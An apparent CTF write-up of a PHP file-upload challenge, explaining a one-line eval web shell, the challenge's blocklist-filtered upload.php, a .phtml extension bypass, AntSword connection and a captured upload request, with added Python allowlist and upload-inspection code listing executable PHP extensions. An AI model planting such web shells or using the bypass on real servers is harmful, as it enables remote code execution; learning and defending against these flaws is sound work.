One-line trojan (一马)

ctfhub_web_file-upload complete walkthrough (continuously updated) - FreeBuf cybersecurity industry portal

File upload (file header bypass)

Example 1: easyupload2.0

Method 1

This is the standard fixed way of writing it in PHP.

@ means that if the expression after it fails to execute, no error is reported.

The eval() function treats the string inside the parentheses as code to be executed.

$_POST['cmd'] means the variable cmd is received from the page via POST.

cmd is the connection password for AntSword (蚁剑).

First write a one-line trojan as 1.txt.

Then rename it to 1.png, because only image formats can be uploaded.

Then intercept the request with Burp and change jpg to php.

It turns out that php is filtered.

upload.php

<?php
session_start();
echo "<meta charset=\"utf-8\">";
if (!isset($_SESSION['user'])) {
    $_SESSION['user'] = md5((string)time().(string)rand(100, 1000));
}
if (isset($_FILES['uploaded'])) {
    $target_path = "./upload";
    // the file is stored under the client-supplied name (basename only)
    $t_path = $target_path."/".basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    // extension = everything after the last dot; this is the only thing that is checked
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $uploaded_tmp = $_FILES['uploaded']['tmp_name'];

    // blocklist: rejects only extensions containing php, hta or ini (case-insensitive)
    if (preg_match("/php|hta|ini/i", $uploaded_ext)) {
        die("php是不行滴");
    } else {
        $content = file_get_contents($uploaded_tmp);
        move_uploaded_file($uploaded_tmp, $t_path);
        echo "{$t_path} successfully uploaded!";
    }
} else {
    die("不传🐎还想要f1ag?");
}
?>

php3, php5, pht, phtml and phps are all file extensions that PHP can execute.

So change the extension to .phtml and the upload succeeds.
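As an added example (Python written for this page, not code from the writeup or the challenge), the following reproduces the blocklist regex from upload.php above next to the allowlist-plus-magic-bytes check a defender would use instead, and runs both over constructed file names. It shows which of the extensions listed above actually slip past the blocklist: only pht and phtml do, since php3, php5 and phps still contain the substring php. The function names, the sample file names and the contents of the allowlist are this example's own choices.

```python
import re
import secrets

# The blocklist regex from the challenge's upload.php, reproduced here for comparison.
BLOCKLIST_RE = re.compile(r"php|hta|ini", re.IGNORECASE)

# Hardened alternative: an allowlist of image extensions with the bytes a real file of
# that type must start with (constructed for this example; extend to what your app needs).
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def extension_of(filename: str) -> str:
    """Text after the last dot of the base name, lower-cased ('' if there is no dot)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def blocklist_allows(filename: str) -> bool:
    """The page's check: reject only when the extension matches php|hta|ini."""
    return BLOCKLIST_RE.search(extension_of(filename)) is None


def allowlist_allows(filename: str, content: bytes) -> bool:
    """Hardened check: extension must be on the allowlist AND the bytes must match that format."""
    ext = extension_of(filename)
    return ext in ALLOWED and content.startswith(ALLOWED[ext])


def storage_name(filename: str) -> str:
    """Server-chosen name: random stem plus the validated extension, never the client's name."""
    ext = extension_of(filename)
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    return f"{secrets.token_hex(16)}.{ext}"


def compare(samples):
    """Run both checks over (filename, content) pairs -> [(name, blocklist_ok, allowlist_ok)]."""
    return [(name, blocklist_allows(name), allowlist_allows(name, data)) for name, data in samples]


# Constructed sample uploads (not taken from the challenge).
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
SAMPLES = [
    ("photo.png", PNG_HEADER),      # genuine image: both checks pass
    ("photo.PNG", PNG_HEADER),      # same, upper-case extension
    ("photo.php", b"<?php"),        # caught by both
    ("photo.php5", b"<?php"),       # 'php5' still contains 'php': the blocklist catches it
    ("photo.phtml", b"<?php"),      # no 'php' substring: slips through the blocklist
    ("photo.pht", b"<?php"),        # same gap
    ("photo.png", b"<?php"),        # right extension, wrong bytes: only the magic check catches it
]

if __name__ == "__main__":
    for name, block_ok, allow_ok in compare(SAMPLES):
        print(f"{name:12} blocklist={'pass' if block_ok else 'reject':6} "
              f"allowlist={'pass' if allow_ok else 'reject'}")
```

The allowlist closes the extension gap and the magic-bytes check rejects a script that merely carries an image extension; storage_name removes the client's control over the stored name. Even then the upload directory should not be served with script execution enabled, because a handler configuration can map further extensions to PHP.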

Note: after editing the request and forwarding it, disable interception, otherwise the page will keep loading.

Next, connect with China AntSword (中国蚁剑).

The password is the value passed in via POST.

After adding the entry, find flag.php in the 3w (www) directory.

NSSCTF{810efa32-9305-4a57-a665-969f34d90749}

Method 2

Pass in

Doing it this way, you can access the file and go straight into phpinfo();

Then visit that page.

Ctrl+F to search the page text.

Get the flag.

POST

POST /upload.php HTTP/1.1
Host: node4.anna.nssctf.cn:28128
Content-Length: 294
Cache-Control: max-age=0
Origin: http://node4.anna.nssctf.cn:28128
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaJYMnfi8JLJdTfbu
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://node4.anna.nssctf.cn:28128/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1740560840,1741511209; HMACCOUNT=9B0CB3FE954795E1; Hm_lpvt_648a44a949074de73151ffaa0a832aec=1741511219; PHPSESSID=kogpi8bg9liflpkkag5ra1eor6
Connection: close

------WebKitFormBoundd
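The truncated request above is the upload itself as sent to upload.php. As an added example in Python (not part of the writeup), here is the inspection a WAF, reverse proxy or upload gateway could run on such a multipart body before it reaches the handler: it splits the parts, reads each file part's filename and declared Content-Type, and flags executable extensions, a declared image type whose bytes are not that format, and PHP open tags in the part body. The request bytes are constructed for the example (a different host and boundary than the page's capture), and the function and constant names are its own.

```python
import re

# Extensions that common PHP handler configurations execute (constructed list for this example).
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phps", "pht", "phtml", "phar", "htaccess", "ini"}
# Declared image types an upload form is expected to send, with the bytes a real file of that type starts with.
IMAGE_MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n", "image/jpeg": b"\xff\xd8\xff", "image/gif": b"GIF8"}
PHP_TAG_RE = re.compile(rb"<\?(php|=)", re.IGNORECASE)
FILENAME_RE = re.compile(r'filename="([^"]*)"')


def split_parts(raw: bytes) -> list:
    """Split a raw multipart/form-data request into [(headers dict, body bytes), ...]."""
    head, _, body = raw.partition(b"\r\n\r\n")          # request line + headers, then the body
    m = re.search(rb"boundary=([^;\r\n]+)", head)
    if not m:
        return []
    delimiter = b"--" + m.group(1).strip(b'"')           # each part starts with "--" + boundary
    parts = []
    for chunk in body.split(delimiter)[1:]:               # [0] is the preamble before the first delimiter
        if chunk.startswith(b"--"):                        # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        hdr_blob, _, content = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in hdr_blob.split(b"\r\n"):
            key, _, value = line.partition(b":")
            headers[key.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
        if content.endswith(b"\r\n"):                      # CRLF that precedes the next delimiter
            content = content[:-2]
        parts.append((headers, content))
    return parts


def inspect_upload(raw: bytes) -> list:
    """Return [(filename, [reasons]), ...] for each file part that looks like a script dressed as an image."""
    findings = []
    for headers, content in split_parts(raw):
        fm = FILENAME_RE.search(headers.get("content-disposition", ""))
        if not fm:
            continue                                       # plain form field, not a file
        filename = fm.group(1)
        ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        reasons = []
        if ext in EXECUTABLE_EXTS:
            reasons.append(f"extension .{ext} is executable on PHP servers")
        declared = headers.get("content-type", "")
        magic = IMAGE_MAGIC.get(declared)
        if magic is not None and not content.startswith(magic):
            reasons.append(f"declared {declared} but the bytes are not that format")
        if PHP_TAG_RE.search(content):
            reasons.append("part body contains a PHP open tag")
        if reasons:
            findings.append((filename, reasons))
    return findings


def _request(filename: str, declared: str, content: bytes) -> bytes:
    """Build a constructed upload request in the shape of the one captured above."""
    b = b"----ConstructedBoundary1234"
    return (
        b"POST /upload.php HTTP/1.1\r\n"
        b"Host: upload.example.test\r\n"
        b"Content-Type: multipart/form-data; boundary=" + b + b"\r\n"
        b"\r\n"
        b"--" + b + b"\r\n"
        b'Content-Disposition: form-data; name="uploaded"; filename="' + filename.encode() + b'"\r\n'
        b"Content-Type: " + declared.encode() + b"\r\n"
        b"\r\n" + content + b"\r\n"
        b"--" + b + b"\r\n"
        b'Content-Disposition: form-data; name="Upload"\r\n'
        b"\r\n"
        b"Upload\r\n"
        b"--" + b + b"--\r\n"
    )


# Constructed samples: a renamed script with an image Content-Type, and a genuine PNG.
SUSPICIOUS_REQUEST = _request("picture.phtml", "image/png", b"<?php echo 'constructed sample'; ?>")
CLEAN_REQUEST = _request("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8)

if __name__ == "__main__":
    for name, reasons in inspect_upload(SUSPICIOUS_REQUEST):
        print(name, "->", "; ".join(reasons))
    print("clean request findings:", inspect_upload(CLEAN_REQUEST))
```

Each reason is logged separately so that a single true signal (a .phtml name with a Content-Type of image/png, for instance) is enough to raise an alert even when the body is not inspected; the handler-side allowlist remains the actual control, this is the detection layer in front of it.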

http://example.com/2024/04/27/一句话木马/
Author: chaye
Posted on: April 27, 2024